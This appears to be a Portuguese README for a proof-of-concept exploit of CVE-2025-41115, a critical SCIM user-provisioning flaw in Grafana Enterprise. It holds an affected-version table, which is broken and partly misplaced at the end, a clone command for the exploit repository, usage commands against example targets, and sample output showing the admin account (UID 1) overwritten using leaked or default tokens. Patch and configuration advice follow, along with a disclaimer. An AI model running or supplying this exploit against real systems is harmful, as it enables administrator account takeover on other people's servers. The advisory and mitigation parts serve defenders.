
CVE-2025-41115

Vulnerabilidade Crítica de Escalação de Privilégios no SCIM do Grafana Enterprise
CVE-2025-41115 é uma vulnerabilidade Crítica (CVSS 10.0) no Grafana Enterprise que afeta seu recurso de provisionamento de usuários via SCIM.
Quando o provisionamento SCIM está habilitado e user_sync_enabled = true, um cliente SCIM malicioso pode enviar um externalId numérico, que o Grafana mapeia erroneamente para um ID de usuário interno — permitindo que um atacante personifique ou sobrescreva contas existentes, incluindo administradores.
⚠️ O Grafana OSS NÃO é afetado.
Condições necessárias para a exploração:
enableSCIM = true[auth.scim] user_sync_enabled = true| Versão | Status |
|---|---|
| 12.0.0 → 12.2.1 | ❌ Vulnerável |
| 12.3.0 | ✅ Corrigida |
| 12.2.1 (build corrigido) | ✅ Corrigida |
| 12.1.3 |
💡 Os serviços Grafana gerenciados (AWS/Azure/Grafana Cloud) foram corrigidos pelos fornecedores.
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git
ou apenas copie e cole o script acima em um arquivo
chmod +x CVE-2025-41115.py
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com
Quando o exploit realmente funciona (ou seja, o alvo está vulnerável e o token é válido), você verá uma saída exatamente assim: texto
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"id": "1", ←←← THIS IS THE KEY LINE (UID 1 overwritten)
"externalId": "1",
"meta": { ... },
"userName": "[email protected]",
"name": {
"formatted": "Pwned User"
},
"emails": [
{
"value": "[email protected]",
"primary": true
}
],
"active": true
}
Atualize para 12.3.0 ou uma das versões de manutenção corrigidas.
Se você não estiver usando o provisionamento SCIM, certifique-se de ter:
enableSCIM = false
ou
[auth.scim]
user_sync_enabled = false
Procure por:
externalId numéricoGaranta que apenas provedores de identidade confiáveis tenham permissão para se comunicar com seu endpoint SCIM.
Fique atento a logins suspeitos, eventos de criação de usuários ou assunção de contas de administrador.
Este PoC destina-se apenas a testes de segurança autorizados e uso educacional em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. O uso não autorizado é ilegal e pode resultar em processo criminal. O autor e o distribuidor não assumem responsabilidade por uso indevido. Corrija imediatamente (≥12.0.6 / 12.3.0+).
| ✅ Corrigida |
| 12.0.6 | ✅ Corrigida |